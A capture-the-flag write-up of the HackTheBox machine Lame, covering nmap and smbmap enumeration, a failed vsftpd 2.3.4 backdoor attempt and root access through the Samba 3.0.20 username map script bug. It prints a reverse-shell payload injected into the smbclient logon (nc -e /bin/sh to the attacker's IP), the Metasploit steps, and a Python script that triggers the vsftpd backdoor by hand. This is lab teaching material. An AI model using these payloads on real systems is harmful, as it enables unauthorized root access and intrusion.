Lame - HackTheBox
TL;DR
This writeup covers Lame, a Linux box on Hack The Box. It exposes two services of interest, vsftpd 2.3.4 and Samba 3.0.20. Anonymous FTP login works but the directory is empty, and the vsftpd backdoor does not give us a shell. Samba, however, is exploitable through command injection in the username field of the session setup, which drops us straight into a root shell; the user and root flags are then read from the filesystem.
Scanning Network
I started with an Nmap scan and found ports 21, 22, 139 and 445 open: FTP, SSH and SMB (the NetBIOS session service and Microsoft-DS, both served by Samba). Nmap's ftp-anon script confirmed that anonymous FTP login is allowed, and version detection gave vsftpd 2.3.4 and Samba 3.0.20. The scan output follows.
Command - nmap -sV -A <ip address>
Nmap scan report for 10.129.127.33
Host is up (0.57s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.23
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m26s, deviation: 2h49m43s, median: 25s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-04-01T06:39:27-04:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
The scan gives us the versions of both services, vsftpd 2.3.4 and Samba 3.0.20-Debian, plus anonymous FTP access, and the host scripts add that SMB message signing is disabled. Both version strings have public exploits, so with this information we move to the next phase.
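The version triage done by eye above can be scripted. The following is an added example and not part of the original writeup: it parses the port lines of an nmap -sV report and flags the two version ranges that matter on this box, the backdoored vsftpd 2.3.4 build and the Samba releases (3.0.20 through 3.0.25rc3) affected by the "username map script" bug, along with anonymous FTP and disabled SMB signing. SAMPLE_SCAN is the page's own scan output, trimmed to the lines the check needs and embedded so the script runs offline; in practice you would pass it the text of a real report.

```python
"""Version triage for an `nmap -sV` report (added example, not the writeup's code)."""
import re

# Constructed sample: the page's scan output, trimmed to the relevant lines.
SAMPLE_SCAN = """\
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
|_ message_signing: disabled (dangerous, but default)
"""

# "21/tcp open ftp vsftpd 2.3.4" -> port, proto, service, version string
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Samba builds carrying the unauthenticated "username map script" bug (CVE-2007-2447)
USERMAP_FIRST = (3, 0, 20, 0)
USERMAP_LAST = (3, 0, 25, 3)      # 3.0.25rc3 was the last affected build


def parse_version(text):
    """Pull the first x.y.z[rcN] out of a version string as a sortable tuple.
    A release candidate sorts below the final release of the same number
    (3.0.25rc3 < 3.0.25). Strings without three numeric parts, such as the
    '3.X - 4.X' nmap prints when it cannot pin the version, give None."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(rc\d+)?", text)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    rc = int(m.group(4)[2:]) if m.group(4) else 10 ** 6   # final release > any rc
    return (major, minor, patch, rc)


def triage(scan_text):
    """Return a list of (port, note) findings for the report text."""
    findings = []
    current_port = None
    for raw in scan_text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            port, _proto, _service, version = m.groups()
            current_port = int(port)
            v = parse_version(version)
            if "vsftpd" in version.lower() and v is not None and v[:3] == (2, 3, 4):
                findings.append((current_port, "vsftpd 2.3.4: backdoored release "
                                 "(CVE-2011-2523), USER containing ':)' opens a shell on 6200/tcp"))
            if "samba" in version.lower() and v is not None and USERMAP_FIRST <= v <= USERMAP_LAST:
                findings.append((current_port, "Samba %s: 'username map script' command "
                                 "execution (CVE-2007-2447)" % version.split()[2]))
        elif "Anonymous FTP login allowed" in line:
            # script output belongs to the port line above it
            findings.append((current_port, "anonymous FTP login: enumerate the share"))
        elif "message_signing: disabled" in line:
            # host-level script result, but it is the SMB service (445) it describes
            findings.append((445, "SMB signing disabled: sessions can be relayed or tampered with"))
    return findings


if __name__ == "__main__":
    for port, note in triage(SAMPLE_SCAN):
        print("%5d  %s" % (port, note))
```

The version comparison is the part worth getting right: nmap's "3.X - 4.X" on port 139 must be treated as unknown rather than as a hit, and a release candidate must sort below its final release so that 3.0.25rc3 is flagged while 3.0.25 is not.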
Enumeration
In the enumeration phase, we will first enumerate the FTP via anonymous user.
Command - ftp 10.129.127.33
Connected to 10.129.127.33.
220 (vsFTPd 2.3.4)
Name (<ip address>:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> pwd
257 "/"
ftp>
Enumerating FTP turned up nothing: the anonymous user lands in an empty directory. The version itself is the lead, since vsFTPd 2.3.4 is the release that shipped with a backdoor, so we will come back to it in the exploitation phase. Now, let's move to the Samba service.
Here, we can enumerate Samba using smbmap to get more information about the machine.
Command - smbmap -H 10.129.127.33
[+] IP: 10.129.127.33:445 Name: 10.129.127.33
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
So the Samba service gives anonymous read and write access to the tmp share (note its comment, "oh noes!"). A recursive listing shows what is in it.
Command - smbmap -H 10.129.127.33 -R
[+] IP: 10.129.127.33:445 Name: 10.129.127.33
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
.\tmp*
dr--r--r-- 0 Thu Apr 1 07:09:11 2021 .
dw--w--w-- 0 Sat Oct 31 02:33:57 2020 ..
dr--r--r-- 0 Thu Apr 1 06:33:10 2021 .ICE-unix
dw--w--w-- 0 Thu Apr 1 06:33:33 2021 vmware-root
dr--r--r-- 0 Thu Apr 1 06:33:35 2021 .X11-unix
fw--w--w-- 11 Thu Apr 1 06:33:35 2021 .X0-lock
fw--w--w-- 0 Thu Apr 1 06:34:22 2021 5581.jsvc_up
fw--w--w-- 1600 Thu Apr 1 06:33:08 2021 vgauthsvclog.txt.0
.\tmp.X11-unix*
dr--r--r-- 0 Thu Apr 1 06:33:35 2021 .
dr--r--r-- 0 Thu Apr 1 07:09:11 2021 ..
fr--r--r-- 0 Thu Apr 1 06:33:35 2021 X0
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
The recursive listing shows what the tmp share holds; the X11 lock files and the vmware-root directory make it clear that the share is the system's /tmp. Now we first try the FTP exploitation.
Exploitation
FTP Exploitation
Here we search Metasploit for a module matching the version (searchsploit finds the same module from the command line).
msf6 > search vsftpd 2.3.4
Matching Modules
# Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
The match is exploit/unix/ftp/vsftpd_234_backdoor (searchsploit lists it as "vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)"). Let's run it from Metasploit.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.129.127.33
RHOSTS => <ip address>
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set LHOST tun0
LHOST => tun0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.129.127.200:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.127.200:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
As you can see above, RHOSTS is the target machine and LHOST, set to our tun0 interface, is the address a reverse payload would call back to. The module sends a USER value containing ":)", which in this tainted vsftpd build makes the daemon open a root shell on 6200/tcp, and then tries to connect to that port. Here the trigger went through (the 331 reply came back) but no session was created, which means 6200/tcp was not reachable from us; with 996 ports reported as filtered in the scan, a host firewall dropping that port is the likely reason. So the backdoor is present but not usable from here, and we move on to SMB, first with Metasploit and then by hand.
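To make the backdoor exchange concrete, here is the trigger re-implemented by hand. This is an added example, not code from the original writeup or from Metasploit. Against a real host you would call trigger_backdoor(target) and talk to the socket it returns; FakeVsftpd is a constructed stand-in for the target, written so the script runs offline, and its firewalled=True mode models what happened on Lame, where the FTP side answers normally but the backdoor port never becomes reachable and no session is created.

```python
"""Trigger the vsftpd 2.3.4 backdoor by hand and show both outcomes
(added example; FakeVsftpd is a constructed simulation, not the real daemon)."""
import socket
import threading
import time

BACKDOOR_TRIGGER = b":)"   # the two bytes the tainted build looks for in USER
BACKDOOR_PORT = 6200       # where the backdoor listens once triggered


def trigger_backdoor(host, ftp_port=21, backdoor_port=BACKDOOR_PORT, timeout=3.0):
    """USER with ':)' then PASS, then try to reach the shell the backdoor opens.
    Returns a connected socket, or None when no session came up (Metasploit's
    'Exploit completed, but no session was created')."""
    ftp = socket.create_connection((host, ftp_port), timeout=timeout)
    banner = ftp.recv(1024)
    if b"vsFTPd 2.3.4" not in banner:
        ftp.close()
        raise RuntimeError("unexpected banner: %r" % banner)
    ftp.sendall(b"USER x" + BACKDOOR_TRIGGER + b"\r\n")
    ftp.recv(1024)                      # 331 Please specify the password.
    ftp.sendall(b"PASS x\r\n")          # the password is irrelevant by now
    shell = None
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            shell = socket.create_connection((host, backdoor_port), timeout=1.0)
            break
        except OSError:                 # refused (no listener) or timed out (filtered)
            time.sleep(0.2)
    ftp.close()
    return shell


def run_command(shell, cmd):
    """Send one command line to the backdoor shell and return its reply."""
    shell.settimeout(2.0)
    shell.sendall(cmd.encode() + b"\n")
    data = b""
    try:
        while not data.endswith(b"\n"):
            chunk = shell.recv(4096)
            if not chunk:
                break
            data += chunk
    except socket.timeout:
        pass
    return data.decode(errors="replace").strip()


class FakeVsftpd(threading.Thread):
    """Constructed simulation of a backdoored vsftpd 2.3.4. It uses ephemeral
    ports; when USER contains ':)' it starts listening on its backdoor port,
    unless firewalled=True, in which case that port stays unreachable as on Lame."""

    def __init__(self, firewalled=False):
        super().__init__(daemon=True)
        self.firewalled = firewalled
        self.ftp_sock = socket.socket()
        self.ftp_sock.bind(("127.0.0.1", 0))
        self.ftp_sock.listen(1)
        self.ftp_port = self.ftp_sock.getsockname()[1]
        self.backdoor_sock = socket.socket()
        self.backdoor_sock.bind(("127.0.0.1", 0))   # bound, not yet listening
        self.backdoor_port = self.backdoor_sock.getsockname()[1]

    def run(self):
        conn, _ = self.ftp_sock.accept()
        conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
        armed = False
        for line in conn.makefile("rb"):
            if line.upper().startswith(b"USER"):
                if BACKDOOR_TRIGGER in line and not self.firewalled:
                    self.backdoor_sock.listen(1)    # the real backdoor forks and listens here
                    armed = True
                conn.sendall(b"331 Please specify the password.\r\n")
            elif line.upper().startswith(b"PASS"):
                conn.sendall(b"530 Login incorrect.\r\n")
                break
        conn.close()
        if armed:
            self.backdoor_sock.settimeout(5.0)
            sh, _ = self.backdoor_sock.accept()
            cmd = sh.makefile("rb").readline().strip()
            # the real backdoor hands out /bin/sh as root; answer `id` the way it would
            sh.sendall(b"uid=0(root) gid=0(root)\n" if cmd == b"id" else b"sh: not found\n")
            sh.close()


def demo(firewalled):
    """Run the trigger against the simulation; returns the output of `id`, or None."""
    srv = FakeVsftpd(firewalled=firewalled)
    srv.start()
    shell = trigger_backdoor("127.0.0.1", srv.ftp_port, srv.backdoor_port, timeout=1.5)
    if shell is None:
        return None
    out = run_command(shell, "id")
    shell.close()
    return out


if __name__ == "__main__":
    print("backdoor port reachable:", demo(firewalled=False))
    print("backdoor port firewalled:", demo(firewalled=True))
```

The point to notice is that the FTP side of the exchange looks identical in both cases: the 331 reply tells you nothing about whether the backdoor is reachable, which is why the Metasploit run above completed its trigger and still reported no session.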
Samba Exploitation (Using Metasploit)
We can search samba with version on metasploit and find a suitable exploit for it.
msf6 > search Samba 3.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
1 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
2 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
3 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
4 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
I will use exploit/multi/samba/usermap_script to exploit the service (use 2 selects it by its index in the search results).
msf6 exploit(multi/samba/usermap_script) > set RHOSTS <machine ip address>
RHOSTS => 10.129.84.98
msf6 exploit(multi/samba/usermap_script) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/samba/usermap_script) > exploit
whoami
root
python -c 'import pty;pty.spawn("/bin/bash")'
root@lame:/#
Samba Exploitation (Manual)
Command Injection
We can connect to the tmp share with smbclient as an anonymous user. The first attempt fails with NT_STATUS_CONNECTION_DISCONNECTED: current smbclient builds negotiate SMB2/SMB3 only, while Samba 3.0.20 speaks nothing newer than SMB1, so we have to lower the client's minimum protocol to NT1 with an option.
Command - smbclient -N //<ip address>/tmp
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
Command - smbclient -N //<ip address>/tmp --option='client min protocol=NT1'
With the protocol floor lowered, the anonymous connection to the tmp share succeeds. Before sending anything, start a Netcat listener on another terminal: the payload calls back as soon as it runs, so the listener has to be up first.
The bug is in Samba's "username map script" handling (CVE-2007-2447, Samba 3.0.20 through 3.0.25rc3): when that smb.conf option is set, the username from the session setup is handed to /bin/sh without sanitisation, before any authentication, so a username containing a backtick-quoted command runs it as the smbd user, which is root. The payload puts nohup in front of nc so that the nc process ignores the hangup when the shell Samba spawned (and the stalled session setup) is torn down, and nc then connects back to our IP and port with -e /bin/sh attached. /bin/bash works as well where it is present.
Payload for username - logon "/=`nohup nc -nv 10.10.14.3 4444 -e /bin/sh`"
smbclient -N //<ip address>/tmp --option='client min protocol=NT1'
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "/=`nohup nc -nv <receiver IP address> 4444 -e /bin/sh`"
Password:
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \>
The listener that catches the shell was started in the other terminal before the logon command was sent. On the smbclient side the session setup fails with NT_STATUS_IO_TIMEOUT because the injected nc never returns, but by then the callback has already arrived.
Command - nc -lvnp 4444
listening on [any] 4444 …
connect to [<receiver ip address>] from (UNKNOWN) [<machine ip address>] 35739
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/#
As mentioned above, I used python -c 'import pty; pty.spawn("/bin/bash")' to upgrade the raw connection to an interactive shell. Since it already runs as root, both the user and the root flag can be read from there.
Thanks for reading this far. If you enjoyed the writeup, do support me here.